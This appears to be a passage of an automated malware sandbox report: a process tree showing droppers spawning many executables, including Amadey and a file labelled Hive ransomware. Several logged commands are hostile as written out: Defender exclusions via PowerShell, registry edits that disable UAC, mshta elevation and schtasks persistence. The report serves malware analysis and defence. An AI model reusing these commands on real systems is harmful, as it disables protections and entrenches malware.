                              • C:\Users\Admin\AppData\Local\Temp\Files\clip.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\clip.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:5508
                              • C:\Users\Admin\AppData\Local\Temp\Files\random.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\random.exe"
                                3⤵
                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                • Checks BIOS information in registry
                                • Executes dropped EXE
                                • Identifies Wine through registry keys
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • System Location Discovery: System Language Discovery
                                • Suspicious behavior: EnumeratesProcesses
                                PID:5304
                              • C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe"
                                3⤵
                                • Executes dropped EXE
                                PID:2956
                              • C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:216
                              • C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe"
                                3⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Drops file in Windows directory
                                • System Location Discovery: System Language Discovery
                                PID:5328
                                • C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe
                                  "C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe"
                                  4⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  PID:2112
                              • C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:4724
                              • C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe"
                                3⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:3476
                              • C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe
                                "C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe"
                                3⤵
                                • Executes dropped EXE
                                • Drops file in System32 directory
                                PID:4368
                                • C:\Windows\SYSTEM32\schtasks.exe
                                  "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                  4⤵
                                  • Scheduled Task/Job: Scheduled Task
                                  PID:5232
                                • C:\Windows\system32\devtun\RuntimeBroker.exe
                                  "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                  4⤵
                                  • Checks computer location settings
                                  • Executes dropped EXE
                                  • Suspicious use of SetWindowsHookEx
                                  PID:2308
                                  • C:\Windows\SYSTEM32\schtasks.exe
                                    "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                    5⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:5504
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SOCpyMZT5RRL.bat" "
                                    5⤵
                                      PID:4012
                                      • C:\Windows\system32\chcp.com
                                        chcp 65001
                                        6⤵
                                          PID:2380
                                        • C:\Windows\system32\PING.EXE
                                          ping -n 10 localhost
                                          6⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:4704
                                        • C:\Windows\system32\devtun\RuntimeBroker.exe
                                          "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                          6⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Suspicious use of SetWindowsHookEx
                                          PID:1864
                                          • C:\Windows\SYSTEM32\schtasks.exe
                                            "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                            7⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:372
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yoo8U08jApyH.bat" "
                                            7⤵
                                              PID:5932
                                              • C:\Windows\system32\chcp.com
                                                chcp 65001
                                                8⤵
                                                  PID:6052
                                                • C:\Windows\system32\PING.EXE
                                                  ping -n 10 localhost
                                                  8⤵
                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                  • Runs ping.exe
                                                  PID:4288
                                                • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                  "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                  8⤵
                                                  • Checks computer location settings
                                                  PID:1852
                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                    "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                    9⤵
                                                    • Scheduled Task/Job: Scheduled Task
                                                    PID:4764
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66F5uGiqJAOk.bat" "
                                                    9⤵
                                                      PID:3964
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        10⤵
                                                          PID:2280
                                                        • C:\Windows\system32\PING.EXE
                                                          ping -n 10 localhost
                                                          10⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:5340
                                                        • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                          "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                          10⤵
                                                            PID:6612
                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                              "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                              11⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:6760
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y1zWGyz3dY2Y.bat" "
                                                              11⤵
                                                                PID:7072
                                                                • C:\Windows\system32\chcp.com
                                                                  chcp 65001
                                                                  12⤵
                                                                    PID:6268
                                                                  • C:\Windows\system32\PING.EXE
                                                                    ping -n 10 localhost
                                                                    12⤵
                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                    • Runs ping.exe
                                                                    PID:6372
                                                                  • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                    "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                    12⤵
                                                                      PID:2312
                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                        "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                        13⤵
                                                                        • Scheduled Task/Job: Scheduled Task
                                                                        PID:6612
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nji9VoGgO53z.bat" "
                                                                        13⤵
                                                                          PID:6480
                                                                          • C:\Windows\system32\chcp.com
                                                                            chcp 65001
                                                                            14⤵
                                                                              PID:6240
                                                                            • C:\Windows\system32\PING.EXE
                                                                              ping -n 10 localhost
                                                                              14⤵
                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                              • Runs ping.exe
                                                                              PID:1464
                                                                            • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                              "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                              14⤵
                                                                                PID:4876
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                  15⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:4300
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1uotMJjAf1rr.bat" "
                                                                                  15⤵
                                                                                    PID:25100
                                                                                    • C:\Windows\system32\chcp.com
                                                                                      chcp 65001
                                                                                      16⤵
                                                                                        PID:46720
                                                                                      • C:\Windows\system32\PING.EXE
                                                                                        ping -n 10 localhost
                                                                                        16⤵
                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                        • Runs ping.exe
                                                                                        PID:46816
                                                                                      • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                                        "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                                        16⤵
                                                                                          PID:10328
                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                            "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                            17⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:24616
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aTrKFTKtFFLY.bat" "
                                                                                            17⤵
                                                                                              PID:24848
                                                                                              • C:\Windows\system32\chcp.com
                                                                                                chcp 65001
                                                                                                18⤵
                                                                                                  PID:24908
                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                  ping -n 10 localhost
                                                                                                  18⤵
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  • Runs ping.exe
                                                                                                  PID:24988
                                                                                                • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                                                  "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                                                  18⤵
                                                                                                    PID:25460
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                      19⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:25508
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scgvYUqhnL4t.bat" "
                                                                                                      19⤵
                                                                                                        PID:10496
                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                          chcp 65001
                                                                                                          20⤵
                                                                                                            PID:26052
                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                            ping -n 10 localhost
                                                                                                            20⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:26124
                                                                                                          • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                                                            "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                                                            20⤵
                                                                                                              PID:26804
                                                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                21⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:26892
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S4XNjx3QJkt7.bat" "
                                                                                                                21⤵
                                                                                                                  PID:27072
                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                    chcp 65001
                                                                                                                    22⤵
                                                                                                                      PID:27192
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping -n 10 localhost
                                                                                                                      22⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:27308
                                                                                                                    • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                                                                      "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                                                                      22⤵
                                                                                                                        PID:27824
                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                          "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                          23⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:27952
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q3k6WSWS4tTa.bat" "
                                                                                                                          23⤵
                                                                                                                            PID:28512
                                                                                                                            • C:\Windows\system32\chcp.com
                                                                                                                              chcp 65001
                                                                                                                              24⤵
                                                                                                                                PID:11172
                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                ping -n 10 localhost
                                                                                                                                24⤵
                                                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                • Runs ping.exe
                                                                                                                                PID:11392
                                                                                                                              • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                                                                                "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                                                                                24⤵
                                                                                                                                  PID:12028
                                                                                                                                  • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                    "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                                    25⤵
                                                                                                                                    • Scheduled Task/Job: Scheduled Task
                                                                                                                                    PID:12120
                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ugCvnfQWROW5.bat" "
                                                                                                                                    25⤵
                                                                                                                                      PID:12320
                                                                                                                                      • C:\Windows\system32\chcp.com
                                                                                                                                        chcp 65001
                                                                                                                                        26⤵
                                                                                                                                          PID:12452
                                                                                                                                        • C:\Windows\system32\PING.EXE
                                                                                                                                          ping -n 10 localhost
                                                                                                                                          26⤵
                                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                          • Runs ping.exe
                                                                                                                                          PID:12540
                                                                                                                                        • C:\Windows\system32\devtun\RuntimeBroker.exe
                                                                                                                                          "C:\Windows\system32\devtun\RuntimeBroker.exe"
                                                                                                                                          26⤵
                                                                                                                                            PID:13028
                                                                                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                              "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
                                                                                                                                              27⤵
                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                              PID:13160
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\djJ6SAoRVT0p.bat" "
                                                                                                                                              27⤵
                                                                                                                                                PID:13424
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5516
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe"
                                                                                                3⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Windows directory
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5184
                                                                                                • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3676
                                                                                              • C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:5380
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c hive.bat >NUL 2>NUL
                                                                                                  4⤵
                                                                                                    PID:1424
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout 1
                                                                                                      5⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:2144
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c shadow.bat >NUL 2>NUL
                                                                                                    4⤵
                                                                                                      PID:4904
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1064
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe" /rl HIGHEST /f
                                                                                                      4⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:5604
                                                                                                    • C:\Users\Admin\AppData\Roaming\svhost\svhost.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe"
                                                                                                      4⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4716
                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                        "schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\svhost\svhost.exe" /rl HIGHEST /f
                                                                                                        5⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:6044
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe"
                                                                                                    3⤵
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    PID:1188
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:4556
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:2312
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'
                                                                                                      4⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:1564
                                                                                                    • C:\Windows\System32\schtasks.exe
                                                                                                      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"
                                                                                                      4⤵
                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                      PID:2172
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        5⤵
                                                                                                          PID:5932
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
                                                                                                      3⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • Drops file in Windows directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:4688
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                                                        4⤵
                                                                                                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Executes dropped EXE
                                                                                                        • Identifies Wine through registry keys
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:5504
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                                          5⤵
                                                                                                            PID:7028
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe"
                                                                                                        3⤵
                                                                                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        PID:3272
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\builder.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\builder.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:2596
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\crack.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\crack.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1864
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe"
                                                                                                        3⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5812
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe"
                                                                                                        3⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:5604
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5604 -s 712
                                                                                                          4⤵
                                                                                                          • Program crash
                                                                                                          PID:5976
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
                                                                                                        3⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:3028
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9021.tmp\9022.tmp\9023.bat C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe"
                                                                                                          4⤵
                                                                                                            PID:100
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              5⤵
                                                                                                                PID:6052
                                                                                                              • C:\Windows\system32\mshta.exe
                                                                                                                mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)
                                                                                                                5⤵
                                                                                                                • Checks computer location settings
                                                                                                                • Access Token Manipulation: Create Process with Token
                                                                                                                PID:5168
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE" goto :target
                                                                                                                  6⤵
                                                                                                                  • Checks computer location settings
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5320
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9E3A.tmp\9E3B.tmp\9E3C.bat C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE goto :target"
                                                                                                                    7⤵
                                                                                                                      PID:5720
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
                                                                                                                        8⤵
                                                                                                                        • UAC bypass
                                                                                                                        PID:6044
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
                                                                                                                        8⤵
                                                                                                                        • UAC bypass
                                                                                                                        PID:5752
                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
                                                                                                                        8⤵
                                                                                                                        • UAC bypass
                                                                                                                        PID:4680
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
                                                                                                                        8⤵
                                                                                                                          PID:6012
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg query HKEY_CLASSES_ROOT\http\shell\open\command
                                                                                                                            9⤵
                                                                                                                              PID:4752
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
                                                                                                                            8⤵
                                                                                                                              PID:5996
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd2b4a46f8,0x7ffd2b4a4708,0x7ffd2b4a4718
                                                                                                                                9⤵
                                                                                                                                  PID:2560
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
                                                                                                                                  9⤵
                                                                                                                                    PID:5928
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
                                                                                                                                    9⤵
                                                                                                                                      PID:32
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,10721389039737169503,4416390960146081845,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2476 /prefetch:8
                                                                                                                                      9⤵
                                                                                                                                        PID:2224
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
